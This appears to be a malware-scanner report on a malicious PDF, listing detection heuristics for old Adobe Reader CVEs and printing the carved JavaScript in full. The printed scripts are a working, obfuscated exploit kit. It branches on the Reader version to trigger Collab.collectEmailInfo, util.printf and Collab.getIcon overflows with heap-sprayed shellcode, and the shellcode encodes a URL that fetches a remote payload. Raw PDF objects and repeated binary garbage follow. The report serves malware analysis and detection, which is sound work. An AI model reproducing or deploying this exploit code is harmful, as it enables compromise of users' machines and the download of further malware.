MALICIOUS
612
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 14
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
app.eval(); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILEDThe cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0116_000.js |
pdf-javascript-stream | PDF /JS object 116 at offset 0x497 | 6326 bytes |
SHA-256: e2dbc6375aa18639476af781c0b21bae04db9c9378a2d74bc5c54ef9bc04df76 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var jHT=unescape,wWu=app.viewerVersion.toString(),iqZ=jHT("t\h\i\s");iqZ=eval(iqZ);if(wWu<8)
{ZIRUG();}
if(wWu>=8&&wWu<9)
{Ejj();}
if(wWu<=9)
{kGEIX();}
function VTCud(aDCja,hwFxk){while(aDCja.length*2<hwFxk){aDCja+=aDCja;}
return aDCja.substring(0,hwFxk/2);}
function ZIRUG(){var vjbRa=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0032\u0000\u0000\u4445\u4445\u4445\u4445");var YIMpl=0x0c0c0c0c;var YmmIZ=[];var kcXNm=0x400000;var IlRQs=vjbRa.length*2;var hwFxk=kcXNm-(IlRQs+0x38);var aDCja=jHT("\u9090\u9090");aDCja=VTCud(aDCja,hwFxk);var ukudk=(YIMpl-0x400000)/kcXNm;for(var mnnit=0;mnnit<ukudk;mnnit++){YmmIZ[mnnit]=aDCja+vjbRa;}
var clRln=jHT("\u0c0c\u0c0c");while(clRln.length<44952)clRln+=clRln;this.collabStore=Collab.collectEmailInfo({subj:"",msg:clRln});}
function Ejj(){var RdN=new Array();function WWL(smf,VDD){while(smf.length*2<VDD){smf+=smf;}
smf=smf.substring(0,VDD/2);return smf;}
bJJ=0x30303030;VNH=jHT("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0031\u0000");var tVV=0x400000;var gew=VNH.length*2;var VDD=tVV-(gew+0x38);var smf=jHT("\u9090\u9090");smf=WWL(smf,VDD);var lDA=(bJJ-0x400000)/tVV;for(var stf=0;stf<lDA;stf++){RdN[stf]=smf+VNH;}
var aQx="37099690927312446598";for(jHT=0;jHT<138*2;jHT++){aQx+="9";}
util.printf("%4"+"50"+"00"+"f",aQx);}
function iaX(lYc)
{lYc=lYc.replace(/[\+1]/g,"0");lYc=lYc.replace(/[\+2]/g,"9");lYc=lYc.replace(/[\+3]/g,"8");lYc=lYc.replace(/[\+4]/g,"7");lYc=lYc.replace(/[\+5]/g,"6");lYc=lYc.replace(/[\+6]/g,"5");lYc=lYc.replace(/[\+7]/g,"4");lYc=lYc.replace(/[\+8]/g,"3");lYc=lYc.replace(/[\+9]/g,"2");lYc=lYc.replace(/[\+0]/g,"1");return lYc;}
function kGEIX(){var fjjTN=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0033\u0000\u0000\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43");fev=jHT("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+fjjTN;WXj=jHT("\u9090\u9090");qsi=5*2;PSH=qsi+fev.length;while(WXj.length<PSH)WXj+=WXj;btM=WXj.substring(0,PSH);xjQ=WXj.substring(0,WXj.length-PSH);while(xjQ.length+PSH<0x40000)xjQ=xjQ+xjQ+btM;Ehw=[];for(Gqh=0;Gqh<180;Gqh++)Ehw[Gqh]=xjQ+fev;var AAK=4012;var Gab=Array(AAK);for(Gqh=0;Gqh<AAK;Gqh++)
{Gab[Gqh]=jHT("\u000a\u000a\u000a\u000a");}
Collab.getIcon(Gab+"_N"+".b"+"un"+"dl"+"e");}
|
|||
javascript_obj0123_002.js |
pdf-javascript-stream | PDF /JS object 123 at offset 0x36E | 6853 bytes |
SHA-256: 9c73dc187064ed5d92a97f8b52088c47d90d172eb2f8a3b027530bd0879d8a8c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+023>>
stream
x^�X[O I ~ϯ�,�� R]��U=�W�k�� ڐ,� ��86� C| V(�}��T��!��ێH�q���T�K��u �r��C��
���p���*�_]m_��7���p� _ζ�������� ��B��Z � �� �N���u �� �Fm(�q� w�w������}{� O�O?���XM& H;)q�o��O� �f�%L�<�P����e1�o��Է睻���t�Q����ty���ih���� 5��r5��������oCyU������; �zr��� =Z�&4�P�U~�2& ��"9Z9� T�Ѫ�
�+M�*�3@���U]W a]�3��e V䯰�C��d�I ���kh�븪,9 u�uϟ'�ā#5�`]Y� �'�ɲ8&'��%g ��l%< �nr���� � Teu)� n�-�ȩj-:�h3����]�J8� �( Ɏ4���3�kȖ6f 2���q����G ��G��$��8,h1 �ʁ? s�k� �,O��Hz[��uT �ԅBd� �,b��P��(��X<�TQ Ȯ= �� 8]D��B�r�U� Nw �Yƛ�]AYC
E� z�9��� �,�ןd <� �
�� ����. �l�x��U �O^ � � ��N�'/�#� �9N � ��y ~�S� ���ǟK����C�=>#ܮ��f��_�^E�
O$�|.pG�4�-/ �Z�>b<�8���� Us�� fV!� �X�A��S0�y @[��m) � &�5nT�3��.|T�^� ��#�`P�� ��M �'^T��� �CP)�?( �, )��P�� ��u��Te�� R
����*��" h��2' �* �d���ܜ�䰞�LxX%l #JVY�ۆQ�4o��YO� r��5��� ��B� � <��Y�2��2�}F�Җe�L �` :���� �Z|�.$��,���y��Ԧ ��Z�` #ڱ�5 ;� y���BJ)FO�� �!�� �{�������4U�j��{�������X�� >�]�#�N%�����E*��
AzK* ����U��ySҊ֍%Q $�#��߉��|��<m����nt^����r�&��l6^��'�;"���n�N�s(_�} ��蒔 L����_� �|� z�ϝ0L"� T7����l�� \N�������0-d-��`Y]������}�6<���ںX��"��6��� ҃��쥳���l>�� S��L���?ڋ���AY�� |�> �n
�� r�1 ���� <�ɯ�∍��{ {o� ) ;���3*�*,�'T���+��@��3�r�"� �
O��k �F�Rqf e!3Y���ZK
"5� 鈵2s��D�a�{ Y���֩� f�2�*�Y�mL* �Ya� N*a yb觉ٕ�J�Ǜ�UF z� vtî *�c�ܓsw6�i���Wk[� q��@v�� <AAoK ��{��碚����ۮ )ga �FV �C�e�t}NZ� �j??�D��Ԗa��.\�+ ��N�K��|�@O��v {F�*� �8������/ *8Q��-
Y�\E T�)�OoM�U o����r��O��r^� �
jS ���M� vTK���� Y9 G=uE�U%Q���,;GUSC�
�'���漇�������f-> ޤH��:� O���
�
�j� � �����E����6� � �� w� �� ����[�X ��t�USa��nӖ�
s �jk �q�����3L� w �~�\Q ��i+iA�j9�n_� � �[ [�V� �nk�� �F! �?�� � L�= ^M��a���Q78~}��b@ D�BM�� ��'��P� �H�� �X�� T+�� � �y�� U?AUB
@m ��� �<L�-�&� {�O����Ӑ
��i��4������P~�� �b0��Ou��'z�hx�x���g�W�@�ӕ����i�� ��b�F ����m�u 7��I�g4 h�t� �N���s�J�����#�w%��ǿ��٨� ���HС �u� +���?jp�|�� #'�N�� 'ȇX � ܗ)8�~KC h�� ��'9и� ��j �� �W�L�H��d� D�|{��Xp:\� .gmHv[���\�} �� |� ��_��S�x�KK- ��*,� �H*��
t�(wt�N��8 �"#e
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 116 at offset 0x497 | 6305 bytes |
SHA-256: c05d5cf80087aa4664cc7ac1578a942153f480ff895aec388591b048d50272d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var jHT=unescape,wWu=app.viewerVersion.toString(),iqZ=jHT("t\h\i\s");iqZ=eval(iqZ);if(wWu<8)
{ZIRUG();}
if(wWu>=8&&wWu<9)
{Ejj();}
if(wWu<=9)
{kGEIX();}
function VTCud(aDCja,hwFxk){while(aDCja.length*2<hwFxk){aDCja+=aDCja;}
return aDCja.substring(0,hwFxk/2);}
function ZIRUG(){var vjbRa=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0032\u0000\u0000\u4445\u4445\u4445\u4445");var YIMpl=0x0c0c0c0c;var YmmIZ=[];var kcXNm=0x400000;var IlRQs=vjbRa.length*2;var hwFxk=kcXNm-(IlRQs+0x38);var aDCja=jHT("\u9090\u9090");aDCja=VTCud(aDCja,hwFxk);var ukudk=(YIMpl-0x400000)/kcXNm;for(var mnnit=0;mnnit<ukudk;mnnit++){YmmIZ[mnnit]=aDCja+vjbRa;}
var clRln=jHT("\u0c0c\u0c0c");while(clRln.length<44952)clRln+=clRln;this.collabStore=Collab.collectEmailInfo({subj:"",msg:clRln});}
function Ejj(){var RdN=new Array();function WWL(smf,VDD){while(smf.length*2<VDD){smf+=smf;}
smf=smf.substring(0,VDD/2);return smf;}
bJJ=0x30303030;VNH=jHT("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0031\u0000");var tVV=0x400000;var gew=VNH.length*2;var VDD=tVV-(gew+0x38);var smf=jHT("\u9090\u9090");smf=WWL(smf,VDD);var lDA=(bJJ-0x400000)/tVV;for(var stf=0;stf<lDA;stf++){RdN[stf]=smf+VNH;}
var aQx="37099690927312446598";for(jHT=0;jHT<138*2;jHT++){aQx+="9";}
util.printf("%45000f",aQx);}
function iaX(lYc)
